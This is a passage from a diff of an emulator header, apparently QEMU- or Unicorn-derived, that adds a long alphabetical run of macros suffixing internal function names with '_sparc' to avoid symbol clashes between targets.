parse_option_bool_sparc +#define parse_option_number parse_option_number_sparc +#define parse_option_size parse_option_size_sparc +#define parse_pair parse_pair_sparc +#define parser_context_free parser_context_free_sparc +#define parser_context_new parser_context_new_sparc +#define parser_context_peek_token parser_context_peek_token_sparc +#define parser_context_pop_token parser_context_pop_token_sparc +#define parser_context_restore parser_context_restore_sparc +#define parser_context_save parser_context_save_sparc +#define parse_str parse_str_sparc +#define parse_type_bool parse_type_bool_sparc +#define parse_type_int parse_type_int_sparc +#define parse_type_number parse_type_number_sparc +#define parse_type_size parse_type_size_sparc +#define parse_type_str parse_type_str_sparc +#define parse_value parse_value_sparc +#define par_write par_write_sparc +#define patch_reloc patch_reloc_sparc +#define phys_map_node_alloc phys_map_node_alloc_sparc +#define 
phys_map_node_reserve phys_map_node_reserve_sparc +#define phys_mem_alloc phys_mem_alloc_sparc +#define phys_mem_set_alloc phys_mem_set_alloc_sparc +#define phys_page_compact phys_page_compact_sparc +#define phys_page_compact_all phys_page_compact_all_sparc +#define phys_page_find phys_page_find_sparc +#define phys_page_set phys_page_set_sparc +#define phys_page_set_level phys_page_set_level_sparc +#define phys_section_add phys_section_add_sparc +#define phys_section_destroy phys_section_destroy_sparc +#define phys_sections_free phys_sections_free_sparc +#define pickNaN pickNaN_sparc +#define pickNaNMulAdd pickNaNMulAdd_sparc +#define pmccfiltr_write pmccfiltr_write_sparc +#define pmccntr_read pmccntr_read_sparc +#define pmccntr_sync pmccntr_sync_sparc +#define pmccntr_write pmccntr_write_sparc +#define pmccntr_write32 pmccntr_write32_sparc +#define pmcntenclr_write pmcntenclr_write_sparc +#define pmcntenset_write pmcntenset_write_sparc +#define pmcr_write pmcr_write_sparc +#define pmintenclr_write pmintenclr_write_sparc +#define pmintenset_write pmintenset_write_sparc +#define pmovsr_write pmovsr_write_sparc +#define pmreg_access pmreg_access_sparc +#define pmsav5_cp_reginfo pmsav5_cp_reginfo_sparc +#define pmsav5_data_ap_read pmsav5_data_ap_read_sparc +#define pmsav5_data_ap_write pmsav5_data_ap_write_sparc +#define pmsav5_insn_ap_read pmsav5_insn_ap_read_sparc +#define pmsav5_insn_ap_write pmsav5_insn_ap_write_sparc +#define pmuserenr_write pmuserenr_write_sparc +#define pmxevtyper_write pmxevtyper_write_sparc +#define print_type_bool print_type_bool_sparc +#define print_type_int print_type_int_sparc +#define print_type_number print_type_number_sparc +#define print_type_size print_type_size_sparc +#define print_type_str print_type_str_sparc +#define propagateFloat128NaN propagateFloat128NaN_sparc +#define propagateFloat32MulAddNaN propagateFloat32MulAddNaN_sparc +#define propagateFloat32NaN propagateFloat32NaN_sparc +#define propagateFloat64MulAddNaN 
propagateFloat64MulAddNaN_sparc +#define propagateFloat64NaN propagateFloat64NaN_sparc +#define propagateFloatx80NaN propagateFloatx80NaN_sparc +#define property_get_alias property_get_alias_sparc +#define property_get_bool property_get_bool_sparc +#define property_get_str property_get_str_sparc +#define property_get_uint16_ptr property_get_uint16_ptr_sparc +#define property_get_uint32_ptr property_get_uint32_ptr_sparc +#define property_get_uint64_ptr property_get_uint64_ptr_sparc +#define property_get_uint8_ptr property_get_uint8_ptr_sparc +#define property_release_alias property_release_alias_sparc +#define property_release_bool property_release_bool_sparc +#define property_release_str property_release_str_sparc +#define property_resolve_alias property_resolve_alias_sparc +#define property_set_alias property_set_alias_sparc +#define property_set_bool property_set_bool_sparc +#define property_set_str property_set_str_sparc +#define pstate_read pstate_read_sparc +#define pstate_write pstate_write_sparc +#define pxa250_initfn pxa250_initfn_sparc +#define pxa255_initfn pxa255_initfn_sparc +#define pxa260_initfn pxa260_initfn_sparc +#define pxa261_initfn pxa261_initfn_sparc +#define pxa262_initfn pxa262_initfn_sparc +#define pxa270a0_initfn pxa270a0_initfn_sparc +#define pxa270a1_initfn pxa270a1_initfn_sparc +#define pxa270b0_initfn pxa270b0_initfn_sparc +#define pxa270b1_initfn pxa270b1_initfn_sparc +#define pxa270c0_initfn pxa270c0_initfn_sparc +#define pxa270c5_initfn pxa270c5_initfn_sparc +#define qapi_dealloc_end_implicit_struct qapi_dealloc_end_implicit_struct_sparc +#define qapi_dealloc_end_list qapi_dealloc_end_list_sparc +#define qapi_dealloc_end_struct qapi_dealloc_end_struct_sparc +#define qapi_dealloc_get_visitor qapi_dealloc_get_visitor_sparc +#define qapi_dealloc_next_list qapi_dealloc_next_list_sparc +#define qapi_dealloc_pop qapi_dealloc_pop_sparc +#define qapi_dealloc_push qapi_dealloc_push_sparc +#define qapi_dealloc_start_implicit_struct 
qapi_dealloc_start_implicit_struct_sparc +#define qapi_dealloc_start_list qapi_dealloc_start_list_sparc +#define qapi_dealloc_start_struct qapi_dealloc_start_struct_sparc +#define qapi_dealloc_start_union qapi_dealloc_start_union_sparc +#define qapi_dealloc_type_bool qapi_dealloc_type_bool_sparc +#define qapi_dealloc_type_enum qapi_dealloc_type_enum_sparc +#define qapi_dealloc_type_int qapi_dealloc_type_int_sparc +#define qapi_dealloc_type_number qapi_dealloc_type_number_sparc +#define qapi_dealloc_type_size qapi_dealloc_type_size_sparc +#define qapi_dealloc_type_str qapi_dealloc_type_str_sparc +#define qapi_dealloc_visitor_cleanup qapi_dealloc_visitor_cleanup_sparc +#define qapi_dealloc_visitor_new qapi_dealloc_visitor_new_sparc +#define qapi_free_boolList qapi_free_boolList_sparc +#define qapi_free_ErrorClassList qapi_free_ErrorClassList_sparc +#define qapi_free_int16List qapi_free_int16List_sparc +#define qapi_free_int32List qapi_free_int32List_sparc +#define qapi_free_int64List qapi_free_int64List_sparc +#define qapi_free_int8List qapi_free_int8List_sparc +#define qapi_free_intList qapi_free_intList_sparc +#define qapi_free_numberList qapi_free_numberList_sparc +#define qapi_free_strList qapi_free_strList_sparc +#define qapi_free_uint16List qapi_free_uint16List_sparc +#define qapi_free_uint32List qapi_free_uint32List_sparc +#define qapi_free_uint64List qapi_free_uint64List_sparc +#define qapi_free_uint8List qapi_free_uint8List_sparc +#define qapi_free_X86CPUFeatureWordInfo qapi_free_X86CPUFeatureWordInfo_sparc +#define qapi_free_X86CPUFeatureWordInfoList qapi_free_X86CPUFeatureWordInfoList_sparc +#define qapi_free_X86CPURegister32List qapi_free_X86CPURegister32List_sparc +#define qbool_destroy_obj qbool_destroy_obj_sparc +#define qbool_from_int qbool_from_int_sparc +#define qbool_get_int qbool_get_int_sparc +#define qbool_type qbool_type_sparc +#define qbus_create qbus_create_sparc +#define qbus_create_inplace qbus_create_inplace_sparc +#define qbus_finalize 
qbus_finalize_sparc +#define qbus_initfn qbus_initfn_sparc +#define qbus_realize qbus_realize_sparc +#define qdev_create qdev_create_sparc +#define qdev_get_type qdev_get_type_sparc +#define qdev_register_types qdev_register_types_sparc +#define qdev_set_parent_bus qdev_set_parent_bus_sparc +#define qdev_try_create qdev_try_create_sparc +#define qdict_add_key qdict_add_key_sparc +#define qdict_array_split qdict_array_split_sparc +#define qdict_clone_shallow qdict_clone_shallow_sparc +#define qdict_del qdict_del_sparc +#define qdict_destroy_obj qdict_destroy_obj_sparc +#define qdict_entry_key qdict_entry_key_sparc +#define qdict_entry_value qdict_entry_value_sparc +#define qdict_extract_subqdict qdict_extract_subqdict_sparc +#define qdict_find qdict_find_sparc +#define qdict_first qdict_first_sparc +#define qdict_flatten qdict_flatten_sparc +#define qdict_flatten_qdict qdict_flatten_qdict_sparc +#define qdict_flatten_qlist qdict_flatten_qlist_sparc +#define qdict_get qdict_get_sparc +#define qdict_get_bool qdict_get_bool_sparc +#define qdict_get_double qdict_get_double_sparc +#define qdict_get_int qdict_get_int_sparc +#define qdict_get_obj qdict_get_obj_sparc +#define qdict_get_qdict qdict_get_qdict_sparc +#define qdict_get_qlist qdict_get_qlist_sparc +#define qdict_get_str qdict_get_str_sparc +#define qdict_get_try_bool qdict_get_try_bool_sparc +#define qdict_get_try_int qdict_get_try_int_sparc +#define qdict_get_try_str qdict_get_try_str_sparc +#define qdict_haskey qdict_haskey_sparc +#define qdict_has_prefixed_entries qdict_has_prefixed_entries_sparc +#define qdict_iter qdict_iter_sparc +#define qdict_join qdict_join_sparc +#define qdict_new qdict_new_sparc +#define qdict_next qdict_next_sparc +#define qdict_next_entry qdict_next_entry_sparc +#define qdict_put_obj qdict_put_obj_sparc +#define qdict_size qdict_size_sparc +#define qdict_type qdict_type_sparc +#define qemu_clock_get_us qemu_clock_get_us_sparc +#define qemu_clock_ptr qemu_clock_ptr_sparc +#define 
qemu_clocks qemu_clocks_sparc +#define qemu_get_cpu qemu_get_cpu_sparc +#define qemu_get_guest_memory_mapping qemu_get_guest_memory_mapping_sparc +#define qemu_get_guest_simple_memory_mapping qemu_get_guest_simple_memory_mapping_sparc +#define qemu_get_ram_block qemu_get_ram_block_sparc +#define qemu_get_ram_block_host_ptr qemu_get_ram_block_host_ptr_sparc +#define qemu_get_ram_fd qemu_get_ram_fd_sparc +#define qemu_get_ram_ptr qemu_get_ram_ptr_sparc +#define qemu_host_page_mask qemu_host_page_mask_sparc +#define qemu_host_page_size qemu_host_page_size_sparc +#define qemu_init_vcpu qemu_init_vcpu_sparc +#define qemu_ld_helpers qemu_ld_helpers_sparc +#define qemu_log_close qemu_log_close_sparc +#define qemu_log_enabled qemu_log_enabled_sparc +#define qemu_log_flush qemu_log_flush_sparc +#define qemu_loglevel_mask qemu_loglevel_mask_sparc +#define qemu_log_vprintf qemu_log_vprintf_sparc +#define qemu_oom_check qemu_oom_check_sparc +#define qemu_parse_fd qemu_parse_fd_sparc +#define qemu_ram_addr_from_host qemu_ram_addr_from_host_sparc +#define qemu_ram_addr_from_host_nofail qemu_ram_addr_from_host_nofail_sparc +#define qemu_ram_alloc qemu_ram_alloc_sparc +#define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_sparc +#define qemu_ram_foreach_block qemu_ram_foreach_block_sparc +#define qemu_ram_free qemu_ram_free_sparc +#define qemu_ram_free_from_ptr qemu_ram_free_from_ptr_sparc +#define qemu_ram_ptr_length qemu_ram_ptr_length_sparc +#define qemu_ram_remap qemu_ram_remap_sparc +#define qemu_ram_setup_dump qemu_ram_setup_dump_sparc +#define qemu_ram_unset_idstr qemu_ram_unset_idstr_sparc +#define qemu_real_host_page_size qemu_real_host_page_size_sparc +#define qemu_st_helpers qemu_st_helpers_sparc +#define qemu_tcg_init_vcpu qemu_tcg_init_vcpu_sparc +#define qemu_try_memalign qemu_try_memalign_sparc +#define qentry_destroy qentry_destroy_sparc +#define qerror_human qerror_human_sparc +#define qerror_report qerror_report_sparc +#define qerror_report_err 
qerror_report_err_sparc +#define qfloat_destroy_obj qfloat_destroy_obj_sparc +#define qfloat_from_double qfloat_from_double_sparc +#define qfloat_get_double qfloat_get_double_sparc +#define qfloat_type qfloat_type_sparc +#define qint_destroy_obj qint_destroy_obj_sparc +#define qint_from_int qint_from_int_sparc +#define qint_get_int qint_get_int_sparc +#define qint_type qint_type_sparc +#define qlist_append_obj qlist_append_obj_sparc +#define qlist_copy qlist_copy_sparc +#define qlist_copy_elem qlist_copy_elem_sparc +#define qlist_destroy_obj qlist_destroy_obj_sparc +#define qlist_empty qlist_empty_sparc +#define qlist_entry_obj qlist_entry_obj_sparc +#define qlist_first qlist_first_sparc +#define qlist_iter qlist_iter_sparc +#define qlist_new qlist_new_sparc +#define qlist_next qlist_next_sparc +#define qlist_peek qlist_peek_sparc +#define qlist_pop qlist_pop_sparc +#define qlist_size qlist_size_sparc +#define qlist_size_iter qlist_size_iter_sparc +#define qlist_type qlist_type_sparc +#define qmp_input_end_implicit_struct qmp_input_end_implicit_struct_sparc +#define qmp_input_end_list qmp_input_end_list_sparc +#define qmp_input_end_struct qmp_input_end_struct_sparc +#define qmp_input_get_next_type qmp_input_get_next_type_sparc +#define qmp_input_get_object qmp_input_get_object_sparc +#define qmp_input_get_visitor qmp_input_get_visitor_sparc +#define qmp_input_next_list qmp_input_next_list_sparc +#define qmp_input_optional qmp_input_optional_sparc +#define qmp_input_pop qmp_input_pop_sparc +#define qmp_input_push qmp_input_push_sparc +#define qmp_input_start_implicit_struct qmp_input_start_implicit_struct_sparc +#define qmp_input_start_list qmp_input_start_list_sparc +#define qmp_input_start_struct qmp_input_start_struct_sparc +#define qmp_input_type_bool qmp_input_type_bool_sparc +#define qmp_input_type_int qmp_input_type_int_sparc +#define qmp_input_type_number qmp_input_type_number_sparc +#define qmp_input_type_str qmp_input_type_str_sparc +#define 
qmp_input_visitor_cleanup qmp_input_visitor_cleanup_sparc +#define qmp_input_visitor_new qmp_input_visitor_new_sparc +#define qmp_input_visitor_new_strict qmp_input_visitor_new_strict_sparc +#define qmp_output_add_obj qmp_output_add_obj_sparc +#define qmp_output_end_list qmp_output_end_list_sparc +#define qmp_output_end_struct qmp_output_end_struct_sparc +#define qmp_output_first qmp_output_first_sparc +#define qmp_output_get_qobject qmp_output_get_qobject_sparc +#define qmp_output_get_visitor qmp_output_get_visitor_sparc +#define qmp_output_last qmp_output_last_sparc +#define qmp_output_next_list qmp_output_next_list_sparc +#define qmp_output_pop qmp_output_pop_sparc +#define qmp_output_push_obj qmp_output_push_obj_sparc +#define qmp_output_start_list qmp_output_start_list_sparc +#define qmp_output_start_struct qmp_output_start_struct_sparc +#define qmp_output_type_bool qmp_output_type_bool_sparc +#define qmp_output_type_int qmp_output_type_int_sparc +#define qmp_output_type_number qmp_output_type_number_sparc +#define qmp_output_type_str qmp_output_type_str_sparc +#define qmp_output_visitor_cleanup qmp_output_visitor_cleanup_sparc +#define qmp_output_visitor_new qmp_output_visitor_new_sparc +#define qobject_decref qobject_decref_sparc +#define qobject_to_qbool qobject_to_qbool_sparc +#define qobject_to_qdict qobject_to_qdict_sparc +#define qobject_to_qfloat qobject_to_qfloat_sparc +#define qobject_to_qint qobject_to_qint_sparc +#define qobject_to_qlist qobject_to_qlist_sparc +#define qobject_to_qstring qobject_to_qstring_sparc +#define qobject_type qobject_type_sparc +#define qstring_append qstring_append_sparc +#define qstring_append_chr qstring_append_chr_sparc +#define qstring_append_int qstring_append_int_sparc +#define qstring_destroy_obj qstring_destroy_obj_sparc +#define qstring_from_escaped_str qstring_from_escaped_str_sparc +#define qstring_from_str qstring_from_str_sparc +#define qstring_from_substr qstring_from_substr_sparc +#define qstring_get_length 
qstring_get_length_sparc +#define qstring_get_str qstring_get_str_sparc +#define qstring_new qstring_new_sparc +#define qstring_type qstring_type_sparc +#define ram_block_add ram_block_add_sparc +#define ram_size ram_size_sparc +#define range_compare range_compare_sparc +#define range_covers_byte range_covers_byte_sparc +#define range_get_last range_get_last_sparc +#define range_merge range_merge_sparc +#define ranges_can_merge ranges_can_merge_sparc +#define raw_read raw_read_sparc +#define raw_write raw_write_sparc +#define rcon rcon_sparc +#define read_raw_cp_reg read_raw_cp_reg_sparc +#define recip_estimate recip_estimate_sparc +#define recip_sqrt_estimate recip_sqrt_estimate_sparc +#define register_cp_regs_for_features register_cp_regs_for_features_sparc +#define register_multipage register_multipage_sparc +#define register_subpage register_subpage_sparc +#define register_tm_clones register_tm_clones_sparc +#define register_types_object register_types_object_sparc +#define regnames regnames_sparc +#define render_memory_region render_memory_region_sparc +#define reset_all_temps reset_all_temps_sparc +#define reset_temp reset_temp_sparc +#define rol32 rol32_sparc +#define rol64 rol64_sparc +#define ror32 ror32_sparc +#define ror64 ror64_sparc +#define roundAndPackFloat128 roundAndPackFloat128_sparc +#define roundAndPackFloat16 roundAndPackFloat16_sparc +#define roundAndPackFloat32 roundAndPackFloat32_sparc +#define roundAndPackFloat64 roundAndPackFloat64_sparc +#define roundAndPackFloatx80 roundAndPackFloatx80_sparc +#define roundAndPackInt32 roundAndPackInt32_sparc +#define roundAndPackInt64 roundAndPackInt64_sparc +#define roundAndPackUint64 roundAndPackUint64_sparc +#define round_to_inf round_to_inf_sparc +#define run_on_cpu run_on_cpu_sparc +#define s0 s0_sparc +#define S0 S0_sparc +#define s1 s1_sparc +#define S1 S1_sparc +#define sa1100_initfn sa1100_initfn_sparc +#define sa1110_initfn sa1110_initfn_sparc +#define save_globals save_globals_sparc +#define 
scr_write scr_write_sparc +#define sctlr_write sctlr_write_sparc +#define set_bit set_bit_sparc +#define set_bits set_bits_sparc +#define set_default_nan_mode set_default_nan_mode_sparc +#define set_feature set_feature_sparc +#define set_float_detect_tininess set_float_detect_tininess_sparc +#define set_float_exception_flags set_float_exception_flags_sparc +#define set_float_rounding_mode set_float_rounding_mode_sparc +#define set_flush_inputs_to_zero set_flush_inputs_to_zero_sparc +#define set_flush_to_zero set_flush_to_zero_sparc +#define set_swi_errno set_swi_errno_sparc +#define sextract32 sextract32_sparc +#define sextract64 sextract64_sparc +#define shift128ExtraRightJamming shift128ExtraRightJamming_sparc +#define shift128Right shift128Right_sparc +#define shift128RightJamming shift128RightJamming_sparc +#define shift32RightJamming shift32RightJamming_sparc +#define shift64ExtraRightJamming shift64ExtraRightJamming_sparc +#define shift64RightJamming shift64RightJamming_sparc +#define shifter_out_im shifter_out_im_sparc +#define shortShift128Left shortShift128Left_sparc +#define shortShift192Left shortShift192Left_sparc +#define simple_mpu_ap_bits simple_mpu_ap_bits_sparc +#define size_code_gen_buffer size_code_gen_buffer_sparc +#define softmmu_lock_user softmmu_lock_user_sparc +#define softmmu_lock_user_string softmmu_lock_user_string_sparc +#define softmmu_tget32 softmmu_tget32_sparc +#define softmmu_tget8 softmmu_tget8_sparc +#define softmmu_tput32 softmmu_tput32_sparc +#define softmmu_unlock_user softmmu_unlock_user_sparc +#define sort_constraints sort_constraints_sparc +#define sp_el0_access sp_el0_access_sparc +#define spsel_read spsel_read_sparc +#define spsel_write spsel_write_sparc +#define start_list start_list_sparc +#define stb_p stb_p_sparc +#define stb_phys stb_phys_sparc +#define stl_be_p stl_be_p_sparc +#define stl_be_phys stl_be_phys_sparc +#define stl_he_p stl_he_p_sparc +#define stl_le_p stl_le_p_sparc +#define stl_le_phys stl_le_phys_sparc 
+#define stl_phys stl_phys_sparc +#define stl_phys_internal stl_phys_internal_sparc +#define stl_phys_notdirty stl_phys_notdirty_sparc +#define store_cpu_offset store_cpu_offset_sparc +#define store_reg store_reg_sparc +#define store_reg_bx store_reg_bx_sparc +#define store_reg_from_load store_reg_from_load_sparc +#define stq_be_p stq_be_p_sparc +#define stq_be_phys stq_be_phys_sparc +#define stq_he_p stq_he_p_sparc +#define stq_le_p stq_le_p_sparc +#define stq_le_phys stq_le_phys_sparc +#define stq_phys stq_phys_sparc +#define string_input_get_visitor string_input_get_visitor_sparc +#define string_input_visitor_cleanup string_input_visitor_cleanup_sparc +#define string_input_visitor_new string_input_visitor_new_sparc +#define strongarm_cp_reginfo strongarm_cp_reginfo_sparc +#define strstart strstart_sparc +#define strtosz strtosz_sparc +#define strtosz_suffix strtosz_suffix_sparc +#define stw_be_p stw_be_p_sparc +#define stw_be_phys stw_be_phys_sparc +#define stw_he_p stw_he_p_sparc +#define stw_le_p stw_le_p_sparc +#define stw_le_phys stw_le_phys_sparc +#define stw_phys stw_phys_sparc +#define stw_phys_internal stw_phys_internal_sparc +#define sub128 sub128_sparc +#define sub16_sat sub16_sat_sparc +#define sub16_usat sub16_usat_sparc +#define sub192 sub192_sparc +#define sub8_sat sub8_sat_sparc +#define sub8_usat sub8_usat_sparc +#define subFloat128Sigs subFloat128Sigs_sparc +#define subFloat32Sigs subFloat32Sigs_sparc +#define subFloat64Sigs subFloat64Sigs_sparc +#define subFloatx80Sigs subFloatx80Sigs_sparc +#define subpage_accepts subpage_accepts_sparc +#define subpage_init subpage_init_sparc +#define subpage_ops subpage_ops_sparc +#define subpage_read subpage_read_sparc +#define subpage_register subpage_register_sparc +#define subpage_write subpage_write_sparc +#define suffix_mul suffix_mul_sparc +#define swap_commutative swap_commutative_sparc +#define swap_commutative2 swap_commutative2_sparc +#define switch_mode switch_mode_sparc +#define switch_v7m_sp 
switch_v7m_sp_sparc +#define syn_aa32_bkpt syn_aa32_bkpt_sparc +#define syn_aa32_hvc syn_aa32_hvc_sparc +#define syn_aa32_smc syn_aa32_smc_sparc +#define syn_aa32_svc syn_aa32_svc_sparc +#define syn_breakpoint syn_breakpoint_sparc +#define sync_globals sync_globals_sparc +#define syn_cp14_rrt_trap syn_cp14_rrt_trap_sparc +#define syn_cp14_rt_trap syn_cp14_rt_trap_sparc +#define syn_cp15_rrt_trap syn_cp15_rrt_trap_sparc +#define syn_cp15_rt_trap syn_cp15_rt_trap_sparc +#define syn_data_abort syn_data_abort_sparc +#define syn_fp_access_trap syn_fp_access_trap_sparc +#define syn_insn_abort syn_insn_abort_sparc +#define syn_swstep syn_swstep_sparc +#define syn_uncategorized syn_uncategorized_sparc +#define syn_watchpoint syn_watchpoint_sparc +#define syscall_err syscall_err_sparc +#define system_bus_class_init system_bus_class_init_sparc +#define system_bus_info system_bus_info_sparc +#define t2ee_cp_reginfo t2ee_cp_reginfo_sparc +#define table_logic_cc table_logic_cc_sparc +#define target_parse_constraint target_parse_constraint_sparc +#define target_words_bigendian target_words_bigendian_sparc +#define tb_add_jump tb_add_jump_sparc +#define tb_alloc tb_alloc_sparc +#define tb_alloc_page tb_alloc_page_sparc +#define tb_check_watchpoint tb_check_watchpoint_sparc +#define tb_find_fast tb_find_fast_sparc +#define tb_find_pc tb_find_pc_sparc +#define tb_find_slow tb_find_slow_sparc +#define tb_flush tb_flush_sparc +#define tb_flush_jmp_cache tb_flush_jmp_cache_sparc +#define tb_free tb_free_sparc +#define tb_gen_code tb_gen_code_sparc +#define tb_hash_remove tb_hash_remove_sparc +#define tb_invalidate_phys_addr tb_invalidate_phys_addr_sparc +#define tb_invalidate_phys_page_range tb_invalidate_phys_page_range_sparc +#define tb_invalidate_phys_range tb_invalidate_phys_range_sparc +#define tb_jmp_cache_hash_func tb_jmp_cache_hash_func_sparc +#define tb_jmp_cache_hash_page tb_jmp_cache_hash_page_sparc +#define tb_jmp_remove tb_jmp_remove_sparc +#define tb_link_page 
tb_link_page_sparc +#define tb_page_remove tb_page_remove_sparc +#define tb_phys_hash_func tb_phys_hash_func_sparc +#define tb_phys_invalidate tb_phys_invalidate_sparc +#define tb_reset_jump tb_reset_jump_sparc +#define tb_set_jmp_target tb_set_jmp_target_sparc +#define tcg_accel_class_init tcg_accel_class_init_sparc +#define tcg_accel_type tcg_accel_type_sparc +#define tcg_add_param_i32 tcg_add_param_i32_sparc +#define tcg_add_param_i64 tcg_add_param_i64_sparc +#define tcg_add_target_add_op_defs tcg_add_target_add_op_defs_sparc +#define tcg_allowed tcg_allowed_sparc +#define tcg_canonicalize_memop tcg_canonicalize_memop_sparc +#define tcg_commit tcg_commit_sparc +#define tcg_cond_to_jcc tcg_cond_to_jcc_sparc +#define tcg_constant_folding tcg_constant_folding_sparc +#define tcg_const_i32 tcg_const_i32_sparc +#define tcg_const_i64 tcg_const_i64_sparc +#define tcg_const_local_i32 tcg_const_local_i32_sparc +#define tcg_const_local_i64 tcg_const_local_i64_sparc +#define tcg_context_init tcg_context_init_sparc +#define tcg_cpu_address_space_init tcg_cpu_address_space_init_sparc +#define tcg_cpu_exec tcg_cpu_exec_sparc +#define tcg_current_code_size tcg_current_code_size_sparc +#define tcg_dump_info tcg_dump_info_sparc +#define tcg_dump_ops tcg_dump_ops_sparc +#define tcg_exec_all tcg_exec_all_sparc +#define tcg_find_helper tcg_find_helper_sparc +#define tcg_func_start tcg_func_start_sparc +#define tcg_gen_abs_i32 tcg_gen_abs_i32_sparc +#define tcg_gen_add2_i32 tcg_gen_add2_i32_sparc +#define tcg_gen_add_i32 tcg_gen_add_i32_sparc +#define tcg_gen_add_i64 tcg_gen_add_i64_sparc +#define tcg_gen_addi_i32 tcg_gen_addi_i32_sparc +#define tcg_gen_addi_i64 tcg_gen_addi_i64_sparc +#define tcg_gen_andc_i32 tcg_gen_andc_i32_sparc +#define tcg_gen_and_i32 tcg_gen_and_i32_sparc +#define tcg_gen_and_i64 tcg_gen_and_i64_sparc +#define tcg_gen_andi_i32 tcg_gen_andi_i32_sparc +#define tcg_gen_andi_i64 tcg_gen_andi_i64_sparc +#define tcg_gen_br tcg_gen_br_sparc +#define 
tcg_gen_brcond_i32 tcg_gen_brcond_i32_sparc +#define tcg_gen_brcond_i64 tcg_gen_brcond_i64_sparc +#define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_sparc +#define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_sparc +#define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_sparc +#define tcg_gen_callN tcg_gen_callN_sparc +#define tcg_gen_code tcg_gen_code_sparc +#define tcg_gen_code_common tcg_gen_code_common_sparc +#define tcg_gen_code_search_pc tcg_gen_code_search_pc_sparc +#define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_sparc +#define tcg_gen_debug_insn_start tcg_gen_debug_insn_start_sparc +#define tcg_gen_deposit_i32 tcg_gen_deposit_i32_sparc +#define tcg_gen_exit_tb tcg_gen_exit_tb_sparc +#define tcg_gen_ext16s_i32 tcg_gen_ext16s_i32_sparc +#define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_sparc +#define tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_sparc +#define tcg_gen_ext32u_i64 tcg_gen_ext32u_i64_sparc +#define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_sparc +#define tcg_gen_ext8u_i32 tcg_gen_ext8u_i32_sparc +#define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_sparc +#define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_sparc +#define tcg_gen_goto_tb tcg_gen_goto_tb_sparc +#define tcg_gen_ld_i32 tcg_gen_ld_i32_sparc +#define tcg_gen_ld_i64 tcg_gen_ld_i64_sparc +#define tcg_gen_ldst_op_i32 tcg_gen_ldst_op_i32_sparc +#define tcg_gen_ldst_op_i64 tcg_gen_ldst_op_i64_sparc +#define tcg_gen_movcond_i32 tcg_gen_movcond_i32_sparc +#define tcg_gen_movcond_i64 tcg_gen_movcond_i64_sparc +#define tcg_gen_mov_i32 tcg_gen_mov_i32_sparc +#define tcg_gen_mov_i64 tcg_gen_mov_i64_sparc +#define tcg_gen_movi_i32 tcg_gen_movi_i32_sparc +#define tcg_gen_movi_i64 tcg_gen_movi_i64_sparc +#define tcg_gen_mul_i32 tcg_gen_mul_i32_sparc +#define tcg_gen_muls2_i32 tcg_gen_muls2_i32_sparc +#define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_sparc +#define tcg_gen_neg_i32 tcg_gen_neg_i32_sparc +#define tcg_gen_neg_i64 tcg_gen_neg_i64_sparc +#define tcg_gen_not_i32 tcg_gen_not_i32_sparc +#define tcg_gen_op0 tcg_gen_op0_sparc 
+#define tcg_gen_op1i tcg_gen_op1i_sparc +#define tcg_gen_op2_i32 tcg_gen_op2_i32_sparc +#define tcg_gen_op2_i64 tcg_gen_op2_i64_sparc +#define tcg_gen_op2i_i32 tcg_gen_op2i_i32_sparc +#define tcg_gen_op2i_i64 tcg_gen_op2i_i64_sparc +#define tcg_gen_op3_i32 tcg_gen_op3_i32_sparc +#define tcg_gen_op3_i64 tcg_gen_op3_i64_sparc +#define tcg_gen_op4_i32 tcg_gen_op4_i32_sparc +#define tcg_gen_op4i_i32 tcg_gen_op4i_i32_sparc +#define tcg_gen_op4ii_i32 tcg_gen_op4ii_i32_sparc +#define tcg_gen_op4ii_i64 tcg_gen_op4ii_i64_sparc +#define tcg_gen_op5ii_i32 tcg_gen_op5ii_i32_sparc +#define tcg_gen_op6_i32 tcg_gen_op6_i32_sparc +#define tcg_gen_op6i_i32 tcg_gen_op6i_i32_sparc +#define tcg_gen_op6i_i64 tcg_gen_op6i_i64_sparc +#define tcg_gen_orc_i32 tcg_gen_orc_i32_sparc +#define tcg_gen_or_i32 tcg_gen_or_i32_sparc +#define tcg_gen_or_i64 tcg_gen_or_i64_sparc +#define tcg_gen_ori_i32 tcg_gen_ori_i32_sparc +#define tcg_gen_qemu_ld_i32 tcg_gen_qemu_ld_i32_sparc +#define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_sparc +#define tcg_gen_qemu_st_i32 tcg_gen_qemu_st_i32_sparc +#define tcg_gen_qemu_st_i64 tcg_gen_qemu_st_i64_sparc +#define tcg_gen_rotl_i32 tcg_gen_rotl_i32_sparc +#define tcg_gen_rotli_i32 tcg_gen_rotli_i32_sparc +#define tcg_gen_rotr_i32 tcg_gen_rotr_i32_sparc +#define tcg_gen_rotri_i32 tcg_gen_rotri_i32_sparc +#define tcg_gen_sar_i32 tcg_gen_sar_i32_sparc +#define tcg_gen_sari_i32 tcg_gen_sari_i32_sparc +#define tcg_gen_setcond_i32 tcg_gen_setcond_i32_sparc +#define tcg_gen_shl_i32 tcg_gen_shl_i32_sparc +#define tcg_gen_shl_i64 tcg_gen_shl_i64_sparc +#define tcg_gen_shli_i32 tcg_gen_shli_i32_sparc +#define tcg_gen_shli_i64 tcg_gen_shli_i64_sparc +#define tcg_gen_shr_i32 tcg_gen_shr_i32_sparc +#define tcg_gen_shifti_i64 tcg_gen_shifti_i64_sparc +#define tcg_gen_shr_i64 tcg_gen_shr_i64_sparc +#define tcg_gen_shri_i32 tcg_gen_shri_i32_sparc +#define tcg_gen_shri_i64 tcg_gen_shri_i64_sparc +#define tcg_gen_st_i32 tcg_gen_st_i32_sparc +#define tcg_gen_st_i64 
